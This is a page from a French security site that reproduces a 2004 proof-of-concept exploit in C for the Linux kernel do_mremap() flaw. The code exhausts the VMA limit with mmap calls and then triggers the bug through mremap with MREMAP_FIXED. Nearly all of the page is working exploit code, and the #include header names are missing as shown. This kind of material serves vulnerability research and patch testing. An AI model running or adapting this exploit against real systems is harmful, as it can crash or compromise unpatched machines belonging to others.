Linux Kernel "mremap()"#2 Local Proof-of-concept
  
/*
                              *  Proof-of-concept exploit code for do_mremap() #2
                              *
                              *  Copyright (C) 2004  Christophe Devine
                              *
                              *  This program is free software; you can redistribute it and/or modify
                              *  it under the terms of the GNU General Public License as published by
                              *  the Free Software Foundation; either version 2 of the License, or
                              *  (at your option) any later version.
                              *
                              *  This program is distributed in the hope that it will be useful,
                              *  but WITHOUT ANY WARRANTY; without even the implied warranty of
                              *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
                              *  GNU General Public License for more details.
                              *
                              *  You should have received a copy of the GNU General Public License
                              *  along with this program; if not, write to the Free Software
                              *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
                              */


                              #include 
                              #include 
                              #include 
                              #include 
                              #include 


                              #define MREMAP_MAYMOVE  1
                              #define MREMAP_FIXED    2


                              #define MREMAP_FLAGS  MREMAP_MAYMOVE | MREMAP_FIXED


                              #define __NR_real_mremap __NR_mremap


                              static inline _syscall5( void *, real_mremap, void *, old_address,
                              size_t, old_size, size_t, new_size,
                              unsigned long, flags, void *, new_address );


                              #define VMA_SIZE 0x00003000


                              int main( void )
                              {
                              int i, ret;
                              void *base0;
                              void *base1;


                              i = 0;


                              while( 1 )
                              {
                              i++;


                              ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ),
                              VMA_SIZE, PROT_READ | PROT_WRITE,
                              MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );


                              if( ret == -1 )
                              {
                              perror( "mmap" );
                              break;
                              }


                              base0 = base1;
                              base1 = (void *) ret;
                              }


                              printf( "created ~%d VMAs\n", i );


                              base0 += 0x1000;
                              base1 += 0x1000;


                              printf( "now mremapping 0x%08X at 0x%08X\n",
                              (int) base1, (int) base0 );


                              real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 );


                              printf( "kernel may not be vulnerable\n" );


                              return( 0 );
                              }

Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits